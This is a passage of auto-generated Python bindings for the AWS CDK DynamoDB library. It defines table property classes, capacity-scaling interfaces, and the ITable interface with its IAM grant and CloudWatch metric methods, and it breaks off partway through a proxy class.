:param point_in_time_recovery_specification: ``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
:param provisioned_throughput: ``AWS::DynamoDB::Table.ProvisionedThroughput``.
:param sse_specification: ``AWS::DynamoDB::Table.SSESpecification``.
:param stream_specification: ``AWS::DynamoDB::Table.StreamSpecification``.
:param table_name: ``AWS::DynamoDB::Table.TableName``.
:param tags: ``AWS::DynamoDB::Table.Tags``.
:param time_to_live_specification: ``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html
"""
self._values = {
"key_schema": key_schema,
}
if attribute_definitions is not None:
self._values["attribute_definitions"] = attribute_definitions
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if global_secondary_indexes is not None:
self._values["global_secondary_indexes"] = global_secondary_indexes
if local_secondary_indexes is not None:
self._values["local_secondary_indexes"] = local_secondary_indexes
if point_in_time_recovery_specification is not None:
self._values[
"point_in_time_recovery_specification"
] = point_in_time_recovery_specification
if provisioned_throughput is not None:
self._values["provisioned_throughput"] = provisioned_throughput
if sse_specification is not None:
self._values["sse_specification"] = sse_specification
if stream_specification is not None:
self._values["stream_specification"] = stream_specification
if table_name is not None:
self._values["table_name"] = table_name
if tags is not None:
self._values["tags"] = tags
if time_to_live_specification is not None:
self._values["time_to_live_specification"] = time_to_live_specification
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``AWS::DynamoDB::Table.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def attribute_definitions(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.AttributeDefinitionProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.AttributeDefinitions``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-attributedef
"""
return self._values.get("attribute_definitions")
@builtins.property
def billing_mode(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.BillingMode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-billingmode
"""
return self._values.get("billing_mode")
@builtins.property
def global_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.GlobalSecondaryIndexProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-gsi
"""
return self._values.get("global_secondary_indexes")
@builtins.property
def local_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.LocalSecondaryIndexProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-lsi
"""
return self._values.get("local_secondary_indexes")
@builtins.property
def point_in_time_recovery_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.PointInTimeRecoverySpecificationProperty",
]
]:
"""``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-pointintimerecoveryspecification
"""
return self._values.get("point_in_time_recovery_specification")
@builtins.property
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"]
]:
"""``AWS::DynamoDB::Table.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-provisionedthroughput
"""
return self._values.get("provisioned_throughput")
@builtins.property
def sse_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.SSESpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.SSESpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-ssespecification
"""
return self._values.get("sse_specification")
@builtins.property
def stream_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.StreamSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.StreamSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-streamspecification
"""
return self._values.get("stream_specification")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.TableName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tablename
"""
return self._values.get("table_name")
@builtins.property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::DynamoDB::Table.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tags
"""
return self._values.get("tags")
@builtins.property
def time_to_live_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.TimeToLiveSpecificationProperty"
]
]:
"""``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-timetolivespecification
"""
return self._values.get("time_to_live_specification")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnTableProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.EnableScalingProps",
jsii_struct_bases=[],
name_mapping={"max_capacity": "maxCapacity", "min_capacity": "minCapacity"},
)
class EnableScalingProps:
def __init__(self, *, max_capacity: jsii.Number, min_capacity: jsii.Number) -> None:
"""Properties for enabling DynamoDB capacity scaling.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
"""
self._values = {
"max_capacity": max_capacity,
"min_capacity": min_capacity,
}
@builtins.property
def max_capacity(self) -> jsii.Number:
"""Maximum capacity to scale to."""
return self._values.get("max_capacity")
@builtins.property
def min_capacity(self) -> jsii.Number:
"""Minimum capacity to scale to."""
return self._values.get("min_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "EnableScalingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.interface(jsii_type="@aws-cdk/aws-dynamodb.IScalableTableAttribute")
class IScalableTableAttribute(jsii.compat.Protocol):
"""Interface for scalable attributes."""
@builtins.staticmethod
def __jsii_proxy_class__():
return _IScalableTableAttributeProxy
@jsii.member(jsii_name="scaleOnSchedule")
def scale_on_schedule(
self,
id: str,
*,
schedule: aws_cdk.aws_applicationautoscaling.Schedule,
end_time: typing.Optional[datetime.datetime] = None,
max_capacity: typing.Optional[jsii.Number] = None,
min_capacity: typing.Optional[jsii.Number] = None,
start_time: typing.Optional[datetime.datetime] = None,
) -> None:
"""Add scheduled scaling for this scaling attribute.
:param id: -
:param schedule: When to perform this action.
:param end_time: When this scheduled action expires. Default: The rule never expires.
:param max_capacity: The new maximum capacity. During the scheduled time, the current capacity is above the maximum capacity, Application Auto Scaling scales in to the maximum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new maximum capacity
:param min_capacity: The new minimum capacity. During the scheduled time, if the current capacity is below the minimum capacity, Application Auto Scaling scales out to the minimum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new minimum capacity
:param start_time: When this scheduled action becomes active. Default: The rule is activate immediately
"""
...
@jsii.member(jsii_name="scaleOnUtilization")
def scale_on_utilization(
self,
*,
target_utilization_percent: jsii.Number,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
"""Scale out or in to keep utilization at a given level.
:param target_utilization_percent: Target utilization percentage for the attribute.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
"""
...
class _IScalableTableAttributeProxy:
"""Interface for scalable attributes."""
__jsii_type__ = "@aws-cdk/aws-dynamodb.IScalableTableAttribute"
@jsii.member(jsii_name="scaleOnSchedule")
def scale_on_schedule(
self,
id: str,
*,
schedule: aws_cdk.aws_applicationautoscaling.Schedule,
end_time: typing.Optional[datetime.datetime] = None,
max_capacity: typing.Optional[jsii.Number] = None,
min_capacity: typing.Optional[jsii.Number] = None,
start_time: typing.Optional[datetime.datetime] = None,
) -> None:
"""Add scheduled scaling for this scaling attribute.
:param id: -
:param schedule: When to perform this action.
:param end_time: When this scheduled action expires. Default: The rule never expires.
:param max_capacity: The new maximum capacity. During the scheduled time, the current capacity is above the maximum capacity, Application Auto Scaling scales in to the maximum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new maximum capacity
:param min_capacity: The new minimum capacity. During the scheduled time, if the current capacity is below the minimum capacity, Application Auto Scaling scales out to the minimum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new minimum capacity
:param start_time: When this scheduled action becomes active. Default: The rule is activate immediately
"""
actions = aws_cdk.aws_applicationautoscaling.ScalingSchedule(
schedule=schedule,
end_time=end_time,
max_capacity=max_capacity,
min_capacity=min_capacity,
start_time=start_time,
)
return jsii.invoke(self, "scaleOnSchedule", [id, actions])
@jsii.member(jsii_name="scaleOnUtilization")
def scale_on_utilization(
self,
*,
target_utilization_percent: jsii.Number,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
"""Scale out or in to keep utilization at a given level.
:param target_utilization_percent: Target utilization percentage for the attribute.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
"""
props = UtilizationScalingProps(
target_utilization_percent=target_utilization_percent,
disable_scale_in=disable_scale_in,
policy_name=policy_name,
scale_in_cooldown=scale_in_cooldown,
scale_out_cooldown=scale_out_cooldown,
)
return jsii.invoke(self, "scaleOnUtilization", [props])
@jsii.interface(jsii_type="@aws-cdk/aws-dynamodb.ITable")
class ITable(aws_cdk.core.IResource, jsii.compat.Protocol):
"""An interface that represents a DynamoDB Table - either created with the CDK, or an existing one."""
@builtins.staticmethod
def __jsii_proxy_class__():
return _ITableProxy
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
...
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
...
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""Optional KMS encryption key associated with this table."""
...
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
...
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
...
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
...
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
...
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the number of Errors executing all Lambdas.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
class _ITableProxy(jsii.proxy_for(aws_cdk.core.IResource)):
"""An interface that represents a DynamoDB Table - either created with the CDK, or an existing one."""
__jsii_type__ = "@aws-cdk/aws-dynamodb.ITable"
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableArn")
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableName")
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""Optional KMS encryption key associated with this table."""
return jsii.get(self, "encryptionKey")
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableStreamArn")
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
return jsii.invoke(self, "grant", [grantee, *actions])
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantFullAccess", [grantee])
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadData", [grantee])
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadWriteData", [grantee])
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
